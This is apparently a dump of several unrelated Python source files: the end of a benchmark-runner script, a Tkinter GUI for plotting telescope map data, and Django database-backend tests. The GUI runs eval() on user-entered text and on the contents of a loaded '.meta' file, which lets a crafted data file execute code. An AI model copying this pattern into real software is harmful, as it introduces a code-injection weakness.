dstat_cmd = 'dstat -tcdrlmgyn --fs >> ' + dstat_file_path
p = Process(target=execute_cmd, args=(dstat_cmd,))
p.start()
my_env['OMP_NUM_THREADS'] = str(t_num)
tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out,
env=my_env)
time_out_util.kill_term_recursive(p.pid)
modify_dstat_file(dstat_file_path)
# 4th: append outputs
write_split(statistics_file_path)
with open(statistics_file_path, 'a+') as ifs:
ifs.write(correct_info)
ifs.write('\nis_time_out:' + str(tle_flag))
ifs.write(my_splitter + time.ctime() + my_splitter)
ifs.write('\n\n\n\n')
if len(info) > 0:
with open(log_file_path, 'a+') as ofs:
ofs.write(info)
logger.info('finish: {}'.format(cmd))
one_round()
if __name__ == '__main__':
hostname = socket.gethostname()
if hostname.startswith('ustgpu2'):
run_exp(env_tag=ustgpu2_tag, with_c_group=False)
elif hostname.startswith('ustgpu1'):
run_exp(env_tag=ustgpu1_tag, with_c_group=False)
elif hostname.startswith('lccpu12'):
run_exp(env_tag=lccpu12_tag, with_c_group=False)
elif hostname.startswith('lccpu12'):
run_exp(lccpu12_tag, False)
elif hostname.startswith('gpu23'):
run_exp(env_tag=gpu23_tag)
elif hostname.startswith('gpu'):
run_exp(env_tag=gpu_other_tag)
else:
# run_exp(env_tag=knl_tag, data_path_tag=exec_path_tag)
run_exp(env_tag=knl_tag, data_path_tag=exec_path_non_hbw_tag)
|
GUI.py
|
import Tkinter as tk
import tkFileDialog
import Tkconstants
from matplotlib import pyplot as plt
import numpy as np
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import gc
import plotGBTMap as gPlot
import sys
import matplotlib.animation as manimation
import Queue
import threading
import time
def find_nearest(array,value):
idx = (np.abs(array-value)).argmin()
return array[idx]
class GUI:
def __init__(self, master):
self.master=master
self.frame = tk.Frame(self.master)
self.data=np.array([])
self.Num=0
self.Num_Freq=0
self.fig=plt.figure(figsize=(7,6))
self.fig_Freq=plt.figure(figsize=(9, 5))
self.inFileTxt=None
self.freq_Txt=None
self.vMin_Txt=None
self.vMax_Txt=None
self.ax_Main=None
self.mark=None
self.metaDic={}
self.setUp()
#self.inFileTxt=None
# self.frame.pack()
def setUp(self):
self.master.protocol('WM_DELETE_WINDOW', self.close)
self.master.wm_title("GBT Map Plot Machine")
##Define the control pannel##
stepOne = tk.LabelFrame(self.master, text=" Control: ")
stepOne.grid(row=0, column=0, columnspan=95, sticky='WN', \
padx=5, pady=5, ipadx=5, ipady=5)
##OpenFile
inFileLbl = tk.Label(stepOne, text="Select the File:")
inFileLbl.grid(row=0, column=0, sticky='W', padx=5, pady=2)
self.inFileTxt = tk.Entry(stepOne)
self.inFileTxt.grid(row=0, column=1, columnspan=7, sticky="WE", pady=3)
self.inFileTxt.insert(0,"/home/chto/Desktop/NewProject3/VictorNewMap/fir_1hr_80-68_newpol_clean_map_I_800.npy")
inFileBtn = tk.Button(stepOne, text="Browse ...",command=self.askopenfile)
inFileBtn.grid(row=0, column=8, sticky='W', padx=5, pady=2)
self.inFileTxt.bind("<Return>", self.EnterFileEvent)
###PlotButton
plotBtn = tk.Button(stepOne, text="Plot",command=self.plotButton)
plotBtn.grid(row=3, column=0, sticky='W', padx=5, pady=2)
###Save Button##
self.outMovieTxt = tk.Entry(stepOne)
self.outMovieTxt.grid(row=3, column=1, columnspan=7, sticky="WE", pady=3)
self.outMovieTxt.insert(0,"./GBTPlotTool/Movie_Test/")
saveMovieBtn = tk.Button(stepOne, text="saveMov",command=self.plotSaveMov)
saveMovieBtn.grid(row=3, column=8, sticky='W', padx=5, pady=2)
self.outFreqTxt = tk.Entry(stepOne)
self.outFreqTxt.grid(row=3, column=9, columnspan=7, sticky="WE", pady=3)
self.outFreqTxt.insert(0,"./GBTPlotTool/Movie_Test/")
saveFreqBtn = tk.Button(stepOne, text="saveFreq",command=self.plotSaveFig)
saveFreqBtn.grid(row=3, column=16, sticky='W', padx=5, pady=2)
###Freq
freq_TxtLabel=tk.Label(stepOne, text="Freq:")
freq_TxtLabel.grid(row=4, column=0, sticky='W', padx=5, pady=2)
self.freq_Txt = tk.Entry(stepOne,width=5)
self.freq_Txt.grid(row=4, column=0, columnspan=5, sticky="W", pady=3,padx=50)
self.freq_Txt.insert(0,"0")
###Freq Button###
IncrFreqBtn = tk.Button(stepOne, text=">>",command=self.IncFreq)
IncrFreqBtn.grid(row=4, column=1, sticky='W', padx=50, pady=2)
DecFreqBtn = tk.Button(stepOne, text="<<",command=self.DecFreq)
DecFreqBtn.grid(row=4, column=1, sticky='W', padx=0, pady=2)
###Plot Pannel###
stepTwo = tk.LabelFrame(self.master, text=" Plot: ", width=600, height=500)
stepTwo.grid(row=0, column=95,columnspan=70,rowspan=10 ,sticky='NW', \
padx=5, pady=10, ipadx=5, ipady=5)
##Freq Plot Pannel###
stepThree = tk.LabelFrame(self.master, text=" Freq Plot: ", width=700, height=450)
stepThree.grid(row=0, column=0,columnspan=60,rowspan=20 ,sticky='WN', \
padx=5, pady=180, ipadx=5, ipady=0)
self.freq_Txt.bind("<Return>", self.EnterEvent)
####PLot Range##########
vMax_TxtLabel=tk.Label(stepOne, text="Vmax:")
vMax_TxtLabel.grid(row=5, column=0, sticky='W', padx=5, pady=2)
self.vMax_Txt = tk.Entry(stepOne,width=5)
self.vMax_Txt.grid(row=5, column=0, columnspan=1, sticky="W", pady=3, padx=60)
self.vMax_Txt.insert(0,"5")
vMin_TxtLabel=tk.Label(stepOne, text="Vmin:")
vMin_TxtLabel.grid(row=5, column=1, sticky='W', padx=0, pady=2)
self.vMin_Txt = tk.Entry(stepOne,width=5)
self.vMin_Txt.grid(row=5, column=1, columnspan=1, sticky="W", pady=3, padx=60)
self.vMin_Txt.insert(0,"-2")
self.vMin_Txt.bind("<Return>", self.EnterEvent)
self.vMax_Txt.bind("<Return>", self.EnterEvent)
def close(self):
self.master.quit()
self.master.destroy()
print "Thanks for using it. Have a nice day :)\n"
def DecFreq(self):
freq=self.freq_Txt.get()
self.freq_Txt.delete(0,"end")
self.freq_Txt.insert(0,repr(eval(freq)-1))
self.plotFigure()
def IncFreq(self):
freq=self.freq_Txt.get()
self.freq_Txt.delete(0,"end")
self.freq_Txt.insert(0,repr(eval(freq)+1))
self.plotFigure()
def EnterFileEvent(self,event):
self.data=np.array([])
self.plotFigure()
def EnterEvent(self,event):
self.plotFigure()
def plotButton(self):
print "open_File"
self.openFile()
self.plotFigure()
def plotFigure(self):
try:
self.figAgg_Main.get_tk_widget().delete(self.figAgg_Main._tkphoto)
self.fig.clf()
plt.close(self.fig)
except:
pass
try:
freq=eval(self.freq_Txt.get())
except:
print "Don't be stupid"
if freq>=0 and freq<=256:
self.ax_Main=gPlot.plotKiyoMap(self.data,self.metaDic,self.fig,round(freq),eval(self.vMax_Txt.get()),eval(self.vMin_Txt.get()))
else:
print "Wong Freq"
if self.Num==0:
self.addFigure(self.fig)
self.Num=1
else:
self.figAgg_Main.draw()
def plotFreqFigure(self,xx=0,yy=0):
try:
self.figAgg_Freq.get_tk_widget().delete(self.figAgg_Main._tkphoto)
self.fig_Freq.clf()
plt.close(self.fig_Freq)
except:
pass
ax=self.fig_Freq.add_subplot(1,1,1)
self.line,=ax.plot(self.data[:,yy,xx])
ax.set_title("RA=%s,Dec=%s"%(repr(yy),repr(xx)))
ax.set_xlabel(r"Freq(channel)")
ax.set_ylabel(r"T(K)")
if self.Num_Freq==0:
self.addFigure(self.fig_Freq,2)
self.Num_Freq=1
else:
self.figAgg_Freq.draw()
def onclick(self,event2):
try:
ix, iy = gPlot.findCoordinate(event2.xdata,event2.ydata,\
self.metaDic,self.data.shape)
# print ix,iy
self.plotFreqFigure(ix,iy)
if self.mark:
try:
self.mark.remove()
except:
pass
self.mark=self.ax_Main.scatter(event2.xdata,event2.ydata,marker='x',color='black',s=60)
self.figAgg_Main.draw()
except:
print "Unexpected error:", sys.exc_info()[0]
# None
# self.line.set_ylim([np.min(self.data[:,iy,ix]),np.max(self.data[:,iy,ix])])
# self.line.set_ydata(self.data[:,iy,ix])
# self.figAgg_Freq.draw()
return
def addFigure(self,figure,param=0):
# set up a canvas with scrollbars
if param==0:
canvas = tk.Canvas(self.master,width=565, height=485)
canvas.grid(row=0, column=100, pady=25,padx=10,sticky='NW')
else:
canvas = tk.Canvas(self.master,width=700, height=400)
canvas.grid(row=0, column=0, columnspan=70, pady=200, padx =5, sticky='SW')
# plug in the figure
figAgg = FigureCanvasTkAgg(figure, canvas)
if param==0:
self.figAgg_Main=figAgg
mplCanvas = self.figAgg_Main.get_tk_widget()
mplCanvas.grid(sticky=Tkconstants.NSEW)
else:
self.figAgg_Freq=figAgg
mplCanvas = self.figAgg_Freq.get_tk_widget()
mplCanvas.grid(sticky=Tkconstants.NSEW)
canvas.create_window(0,0, window=mplCanvas,tags="Test")
canvas.config(scrollregion=canvas.bbox(Tkconstants.ALL))
if param==0:
cid = figure.canvas.mpl_connect('button_press_event', self.onclick)
#canvas.delete("all")
def openFile(self):
try:
name=self.inFileTxt.get()
self.data=np.load(name,'r')
f = open(name+".meta",'r')
meTa=f.readlines()
self.metaDic=eval(meTa[0])
f.close()
# self.Num=0
except:
print "File Not Exist \n"
print name
self.inFileTxt.delete(0,'end')
return
def askopenfile(self):
AskReturn=tkFileDialog.askopenfile()
if AskReturn!=None:
self.inFileTxt.delete(0,'end')
self.inFileTxt.insert(0,AskReturn.name)
return AskReturn
def plotSaveMov(self):
string=self.outMovieTxt.get()
if string:
AskReturn=tkFileDialog.asksaveasfile(initialdir=string,\
filetypes=[('Movie files', '*.mp4'),
('All files', '*'),
]
)
else:
AskReturn=tkFileDialog.asksaveasfile()
if AskReturn!=None:
self.outMovieTxt.delete(0,'end')
self.outMovieTxt.insert(0,AskReturn.name)
try:
self.plotMovie(self.outMovieTxt.get())
except:
None
return AskReturn
def plotSaveFig(self):
string=self.outFreqTxt.get()
if string:
AskReturn=tkFileDialog.asksaveasfile(initialdir=string,\
filetypes=[('figure file', '*.png'),
('All files', '*'),
]
)
else:
AskReturn=tkFileDialog.asksaveasfile()
if AskReturn!=None:
self.outFreqTxt.delete(0,'end')
self.outFreqTxt.insert(0,AskReturn.name)
try:
self.fig_Freq.savefig(self.outFreqTxt.get())
except:
None
return AskReturn
def plotMovie(self,name):
queue=Queue.Queue()
window = tk.Toplevel(self.master)
FFMpegWriter = manimation.writers['ffmpeg']
fig = plt.figure()
writer = FFMpegWriter(fps=3)
break_tag=[False]
def checkqueue(window):
while queue.qsize():
try:
msg = queue.get(0)
inFileLbl = tk.Label(window,\
text=" Running...\nFrequency=%s"%repr(msg))
inFileLbl.grid(row=0, column=0, sticky='W', padx=5, pady=2)
except Queue.Empty:
pass
def call():
with writer.saving(fig, name, 100):
for i in xrange(self.data.shape[0]):
if break_tag[0]:
break
queue.put(i)
ax=gPlot.plotKiyoMap(self.data,self.metaDic,fig,i,eval(self.vMax_Txt.get()),eval(self.vMin_Txt.get()))
writer.grab_frame()
plt.clf()
def on_closing():
break_tag[0]=True
window.destroy()
window.protocol("WM_DELETE_WINDOW", on_closing)
thread = threading.Thread(target=call)
thread.start()
while thread.is_alive():
checkqueue(window)
window.update()
time.sleep(0.001)
window.destroy()
plt.close(fig)
fig.clf()
return
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import copy
import datetime
from decimal import Decimal
import re
import threading
import unittest
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (connection, connections, DEFAULT_DB_ALIAS,
DatabaseError, IntegrityError, transaction)
from django.db.backends.signals import connection_created
from django.db.backends.sqlite3.base import DatabaseOperations
from django.db.backends.postgresql_psycopg2 import version as pg_version
from django.db.backends.utils import format_number, CursorWrapper
from django.db.models import Sum, Avg, Variance, StdDev
from django.db.models.fields import (AutoField, DateField, DateTimeField,
DecimalField, IntegerField, TimeField)
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (TestCase, TransactionTestCase, override_settings,
skipUnlessDBFeature, skipIfDBFeature)
from django.test.utils import str_prefix, IgnoreAllDeprecationWarningsMixin
from django.utils import six
from django.utils.six.moves import xrange
from . import models
class DummyBackendTest(TestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in xrange(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
statements = connection.creation.sql_create_model(models.Square,
style=no_style())
match = re.search('"id" ([^,]+),', statements[0][0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
def test_convert_values_to_handle_null_value(self):
convert_values = DatabaseOperations(connection).convert_values
self.assertIsNone(convert_values(None, AutoField(primary_key=True)))
self.assertIsNone(convert_values(None, DateField()))
self.assertIsNone(convert_values(None, DateTimeField()))
self.assertIsNone(convert_values(None, DecimalField()))
self.assertIsNone(convert_values(None, IntegerField()))
self.assertIsNone(convert_values(None, TimeField()))
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 8.3 beta4", 80300)
self.assert_parses("PostgreSQL 8.3", 80300)
self.assert_parses("EnterpriseDB 8.3", 80300)
self.assert_parses("PostgreSQL 8.3.6", 80306)
self.assert_parses("PostgreSQL 8.4beta1", 80400)
self.assert_parses("PostgreSQL 8.3.1 on i386-apple-darwin9.2.2, compiled by GCC i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)", 80301)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 8.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 80300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
databases = copy.deepcopy(settings.DATABASES)
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
new_connection.settings_dict['TIME_ZONE'] = new_tz
new_connection.enter_transaction_management()
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
databases = copy.deepcopy(settings.DATABASES)
databases[DEFAULT_DB_ALIAS]['AUTOCOMMIT'] = False
new_connections = ConnectionHandler(databases)
new_connection = new_connections[DEFAULT_DB_ALIAS]
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql_psycopg2.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
@unittest.skipUnless(connection.vendor == 'mysql', "Test only for MySQL")
class MySQLTests(TestCase):
def test_autoincrement(self):
"""
Check that auto_increment fields are reset correctly by sql_flush().
Before MySQL version 5.0.13 TRUNCATE did not do auto_increment reset.
Refs #16961.
"""
statements = connection.ops.sql_flush(no_style(),
tables=['test'],
sequences=[{
'table': 'test',
'col': 'somecol',
}])
found_reset = False
for sql in statements:
found_reset = found_reset or 'ALTER TABLE' in sql
if connection.mysql_version < (5, 0, 13):
self.assertTrue(found_reset)
else:
self.assertFalse(found_reset)
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
try:
connection.ops.last_executed_query(cursor, '', ())
except Exception:
self.fail("'last_executed_query' should not raise an exception.")
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
@skipUnlessDBFeature('supports_long_model_names')
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertTrue(obj.pk > 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertTrue(data["connection"].connection is connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertTrue(data == {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TestCase):
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
